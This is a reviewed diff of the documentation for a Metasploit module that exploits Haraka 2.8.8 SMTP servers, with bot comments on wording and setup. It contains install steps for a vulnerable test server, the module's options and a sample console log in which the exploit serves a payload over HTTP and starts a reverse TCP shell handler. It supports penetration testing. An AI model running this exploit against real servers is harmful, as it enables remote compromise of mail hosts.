|
1 | 1 | ## Vulnerable Application
|
2 | 2 |
|
3 |
| - You can get the vulnerable Haraka installes by running this script: |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu 16.04 or similar: |
4 | 4 | ```
|
5 |
| - #Install a clean server (for example on Digital Ocean) |
6 |
| - #I picked the smallest Ubuntu 16.04.1 LTS for this guide. |
7 |
| - #I needed to enable swap on that installation |
8 |
| - fallocate -l 4G /swapfile |
9 |
| - chmod 600 /swapfile |
10 |
| - mkswap /swapfile |
11 |
| - swapon /swapfile |
12 |
| - swapon -s |
13 |
| -
|
14 |
| - #install nodejs and npm: Note I have no clue what I'm doing here but it works! |
| 5 | + #install nodejs and npm |
15 | 6 | apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
|
| 7 | +
|
| 8 | + #Haraka setup |
16 | 9 | wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
|
17 | 10 | tar xvzf v2.8.8.tar.gz
|
18 | 11 | cd Haraka-2.8.8/
|
19 | 12 | npm install -g npm
|
20 | 13 | ln -s /usr/bin/nodejs /usr/bin/node
|
21 | 14 | npm install -g
|
22 | 15 |
|
23 |
| - #Haraka setup |
24 |
| - haraka -i /root/haraka |
| 16 | + haraka -i haraka |
25 | 17 |
|
26 |
| - cat << EOF > /root/haraka/config/plugins |
| 18 | + cat << EOF > haraka/config/plugins |
27 | 19 | access
|
28 | 20 | rcpt_to.in_host_list
|
29 | 21 | data.headers
|
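Review bot: The install lines in this hunk (`apt-get install ...`, `ln -s /usr/bin/nodejs /usr/bin/node`, `npm install -g`) still need root, but with the `/root/haraka` paths replaced by a relative `haraka` the script no longer implies a root shell, and only the final launch line in this patch carries `sudo`. Either prefix these lines with `sudo` as well or state in the intro that the whole script runs as root. Two smaller points: "Setup" in the new intro line is used as a verb and should be "Set up", and removing the swap block also removes the only hint that the smallest Ubuntu 16.04.1 instance needed swap, which a one-line comment could preserve.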
|
32 | 24 | max_unrecognized_commands
|
33 | 25 | EOF
|
34 | 26 |
|
35 |
| - cat << EOF >> /root/haraka/config/host_list |
36 |
| - haraka.test |
37 |
| - EOF |
| 27 | + echo haraka.test >> haraka/config/host_list |
38 | 28 |
|
39 | 29 | # Launch haraka as root
|
40 |
| - haraka -c /root/haraka/ |
| 30 | + sudo haraka -c haraka/ |
41 | 31 | ```
|
42 | 32 |
|
43 | 33 | ## Verification Steps
|
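Review bot: `sudo haraka -c haraka/` and `echo haraka.test >> haraka/config/host_list` now depend on the current directory being the one where `haraka -i haraka` was run (inside `Haraka-2.8.8/` per the earlier `cd`), which the old absolute `/root/haraka` paths did not. A short comment saying the remaining commands must be run from that directory would avoid a confusing failure when the block is pasted in pieces. Note also that `>>` appends, so re-running the script adds a duplicate `haraka.test` entry to `host_list`.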
|
51 | 41 |
|
52 | 42 | ## Options
|
53 | 43 |
|
54 |
| - **EHLO** |
55 |
| - |
56 |
| - String used in the SMTP EHLO command |
57 |
| - |
58 |
| - **MAILTO** |
| 44 | + **to_email** |
59 | 45 |
|
60 | 46 | String used in the SMTP MAILTO command
|
61 | 47 |
|
62 |
| - **MAILFROM** |
| 48 | + **lhost** |
| 49 | + |
| 50 | + The address to serve the payload from |
| 51 | + |
| 52 | + **rhost** |
63 | 53 |
|
64 |
| - String used in the SMTP FROM command |
| 54 | + The address or hostname to target |
65 | 55 |
|
66 |
| - **DOWNHOST** |
| 56 | + **payload** |
67 | 57 |
|
68 |
| - Download server for payload (if empty SRVHOST will be used) |
69 |
| - |
70 |
| - **DOWNFILE** |
71 |
| - |
72 |
| - File to download from DOWNHOST (if empty a random name will be generated and used) |
| 58 | + Any compatible Metasploit payload |
73 | 59 |
|
74 | 60 | ## Scenarios
|
75 | 61 |
|
76 | 62 | Specific demo of using the module that might be useful in a real world scenario.
|
77 | 63 |
|
78 | 64 | ```
|
79 |
| - msf > use exploit/linux/smtp/harakiri |
80 |
| - msf exploit(harakiri) > set RHOST 257.6.26.2 |
| 65 | + msf > use exploit/linux/smtp/harakiri |
| 66 | + msf exploit(harakiri) > set RHOST 257.6.26.2 |
81 | 67 | RHOST => 257.6.26.2
|
82 | 68 | msf exploit(harakiri) > exploit
|
83 | 69 | [*] Exploit running as background job.
|
84 | 70 |
|
85 |
| - [*] Started reverse TCP handler on 6.6.6.6:4444 |
| 71 | + [*] Started reverse TCP handler on 6.6.6.6:4444 |
86 | 72 | [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ...
|
87 | 73 | [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw
|
88 | 74 | [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw
|
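Review bot: The renamed `**to_email**` option keeps the old description "String used in the SMTP MAILTO command", but SMTP has no MAILTO command; the recipient is given in `RCPT TO`, so the description should say that this is the recipient address sent in `RCPT TO`. The new option names are also lower case (`lhost`, `rhost`, `payload`) while the scenario below uses `set RHOST`; pick one casing so the Options section matches what the reader types. The three scenario lines that are removed and re-added (`use exploit/linux/smtp/harakiri`, `set RHOST 257.6.26.2`, `Started reverse TCP handler`) appear identical, so this looks like a whitespace-only change that could be called out in the commit message.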
|